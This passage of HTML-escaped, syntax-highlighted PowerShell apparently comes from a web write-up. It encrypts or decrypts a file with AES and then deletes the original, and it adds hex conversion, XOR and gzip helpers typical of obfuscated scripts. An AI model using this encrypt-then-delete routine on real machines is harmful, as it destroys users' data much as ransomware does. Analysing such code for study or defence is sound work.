            &lt;span class="nv"&gt;$FileSW&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$AESP&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;IV&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$AESP&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;IV&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="nv"&gt;$Transform&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$AESP&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;CreateEncryptor&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="no"&gt;[Byte[]]&lt;/span&gt;&lt;span class="nv"&gt;$LenIV&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;New-Object&lt;/span&gt; &lt;span class="n"&gt;Byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;4&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="nv"&gt;$FileSR&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Seek&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="no"&gt;[System.IO.SeekOrigin]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="k"&gt;Begin&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;Out-Null&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="nv"&gt;$FileSR&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Read&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$LenIV&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;3&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;Out-Null&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="no"&gt;[Int]&lt;/span&gt;&lt;span class="nv"&gt;$LIV&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="no"&gt;[System.BitConverter]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;ToInt32&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$LenIV&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="no"&gt;[Byte[]]&lt;/span&gt;&lt;span class="nv"&gt;$IV&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;New-Object&lt;/span&gt; &lt;span class="n"&gt;Byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="nv"&gt;$LIV&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="nv"&gt;$FileSR&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Seek&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;4&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="no"&gt;[System.IO.SeekOrigin]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="k"&gt;Begin&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;Out-Null&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="nv"&gt;$FileSR&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Read&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$IV&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$LIV&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;Out-Null&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="nv"&gt;$AESP&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;IV&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$IV&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="nv"&gt;$Transform&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$AESP&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;CreateDecryptor&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="p"&gt;};&lt;/span&gt;
        &lt;span class="nv"&gt;$CryptoS&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;New-Object&lt;/span&gt; &lt;span class="n"&gt;System&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Security&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Cryptography&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;CryptoStream&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$FileSW&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$Transform&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="no"&gt;[System.Security.Cryptography.CryptoStreamMode]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;Write&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="no"&gt;[Int]&lt;/span&gt;&lt;span class="nv"&gt;$Count&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="no"&gt;[Int]&lt;/span&gt;&lt;span class="nv"&gt;$BlockSzBts&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$AESP&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;BlockSize&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt; &lt;span class="n"&gt;8&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="no"&gt;[Byte[]]&lt;/span&gt;&lt;span class="nv"&gt;$Data&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;New-Object&lt;/span&gt; &lt;span class="n"&gt;Byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="nv"&gt;$BlockSzBts&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="k"&gt;Do&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="nv"&gt;$Count&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$FileSR&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Read&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$Data&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$BlockSzBts&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="nv"&gt;$CryptoS&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$Data&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$Count&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;While&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$Count&lt;/span&gt; &lt;span class="o"&gt;-gt&lt;/span&gt; &lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="nv"&gt;$CryptoS&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;FlushFinalBlock&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
        &lt;span class="nv"&gt;$CryptoS&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Close&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
        &lt;span class="nv"&gt;$FileSR&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Close&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
        &lt;span class="nv"&gt;$FileSW&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Close&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
        &lt;span class="nb"&gt;Clear-variable&lt;/span&gt; &lt;span class="n"&gt;-Name&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;key&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="nb"&gt;Remove-Item&lt;/span&gt; &lt;span class="nv"&gt;$File&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="n"&gt;H2B&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;param&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$HX&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nv"&gt;$HX&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$HX&lt;/span&gt; &lt;span class="n"&gt;-split&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;(..)&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="p"&gt;?&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nv"&gt;$_&lt;/span&gt;
    &lt;span class="p"&gt;};&lt;/span&gt;
    &lt;span class="k"&gt;ForEach&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$value&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nv"&gt;$HX&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;
        &lt;span class="no"&gt;[Convert]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;ToInt32&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;16&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="n"&gt;A2H&lt;/span&gt;&lt;span class="p"&gt;(){&lt;/span&gt;
    &lt;span class="k"&gt;Param&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$a&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nv"&gt;$c&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="nv"&gt;$b&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$a&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ToCharArray&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;Foreach&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$element&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nv"&gt;$b&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nv"&gt;$c&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$c&lt;/span&gt; &lt;span class="p"&gt;+&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot; &amp;quot;&lt;/span&gt; &lt;span class="p"&gt;+&lt;/span&gt; &lt;span class="no"&gt;[System.String]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;Format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;{0:X}&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="no"&gt;[System.Convert]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;ToUInt32&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$element&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
    &lt;span class="p"&gt;};&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nv"&gt;$c&lt;/span&gt; &lt;span class="o"&gt;-replace&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39; &amp;#39;&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="n"&gt;H2A&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;Param&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$a&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nv"&gt;$outa&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="nv"&gt;$a&lt;/span&gt; &lt;span class="n"&gt;-split&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;(..)&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="p"&gt;?&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nv"&gt;$_&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;  &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="k"&gt;forEach&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="no"&gt;[char]&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="no"&gt;[convert]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;toint16&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$_&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;16&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="k"&gt;forEach&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nv"&gt;$outa&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$outa&lt;/span&gt; &lt;span class="p"&gt;+&lt;/span&gt; &lt;span class="nv"&gt;$_&lt;/span&gt;
    &lt;span class="p"&gt;};&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nv"&gt;$outa&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="n"&gt;B2H&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;param&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$DEC&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nv"&gt;$tmp&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;ForEach&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$value&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nv"&gt;$DEC&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;
        &lt;span class="nv"&gt;$a&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;{0:x}&amp;quot;&lt;/span&gt; &lt;span class="o"&gt;-f&lt;/span&gt; &lt;span class="no"&gt;[Int]&lt;/span&gt;&lt;span class="nv"&gt;$value&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$a&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;length&lt;/span&gt; &lt;span class="o"&gt;-eq&lt;/span&gt; &lt;span class="n"&gt;1&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;
            &lt;span class="nv"&gt;$tmp&lt;/span&gt; &lt;span class="p"&gt;+=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;0&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;+&lt;/span&gt; &lt;span class="nv"&gt;$a&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="nv"&gt;$tmp&lt;/span&gt; &lt;span class="p"&gt;+=&lt;/span&gt; &lt;span class="nv"&gt;$a&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;};&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nv"&gt;$tmp&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="n"&gt;ti_rox&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;param&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$b1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$b2&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nv"&gt;$b1&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="n"&gt;H2B&lt;/span&gt; &lt;span class="nv"&gt;$b1&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nv"&gt;$b2&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="n"&gt;H2B&lt;/span&gt; &lt;span class="nv"&gt;$b2&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nv"&gt;$cont&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;New-Object&lt;/span&gt; &lt;span class="n"&gt;Byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="nv"&gt;$b1&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;count&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$b1&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;count&lt;/span&gt; &lt;span class="o"&gt;-eq&lt;/span&gt; &lt;span class="nv"&gt;$b2&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;count&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$i&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="nv"&gt;$i&lt;/span&gt; &lt;span class="o"&gt;-lt&lt;/span&gt; &lt;span class="nv"&gt;$b1&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;count&lt;/span&gt; &lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="nv"&gt;$i&lt;/span&gt;&lt;span class="p"&gt;++)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="nv"&gt;$cont&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;$i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$b1&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;$i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;-bxor&lt;/span&gt; &lt;span class="nv"&gt;$b2&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;$i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;};&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nv"&gt;$cont&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="n"&gt;B2G&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;param&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="no"&gt;[byte[]]&lt;/span&gt;&lt;span class="nv"&gt;$Data&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;Process&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nv"&gt;$out&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="no"&gt;[System.IO.MemoryStream]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;new&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
        &lt;span class="nv"&gt;$gStream&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;New-Object&lt;/span&gt; &lt;span class="n"&gt;System&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;IO&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Compression&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;GzipStream&lt;/span&gt; &lt;span class="nv"&gt;$out&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="no"&gt;[IO.Compression.CompressionMode]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;Compress&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="nv"&gt;$gStream&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$Data&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$Data&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="nv"&gt;$gStream&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Close&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nv"&gt;$out&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ToArray&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="n"&gt;G2B&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;param&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="no"&gt;[byte[]]&lt;/span&gt;&lt;span class="nv"&gt;$Data&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;Process&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nv"&gt;$SrcData&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;New-Object&lt;/span&gt; &lt;span class="n"&gt;System&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;IO&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;MemoryStream&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt; &lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$Data&lt;/span&gt; &lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="nv"&gt;$output&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;New-Object&lt;/span&gt; &lt;span class="n"&gt;System&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;IO&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;MemoryStream&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="nv"&gt;$gStream&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;New-Object&lt;/span&gt; &lt;span class="n"&gt;System&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;IO&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Compression&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;GzipStream&lt;/span&gt; &lt;span class="nv"&gt;$SrcData&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="no"&gt;[IO.Compression.CompressionMode]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;Decompress&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="nv"&gt;$gStream&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;CopyTo&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt; &lt;span class="nv"&gt;$output&lt;/span&gt; &lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="nv"&gt;$gStream&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Close&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
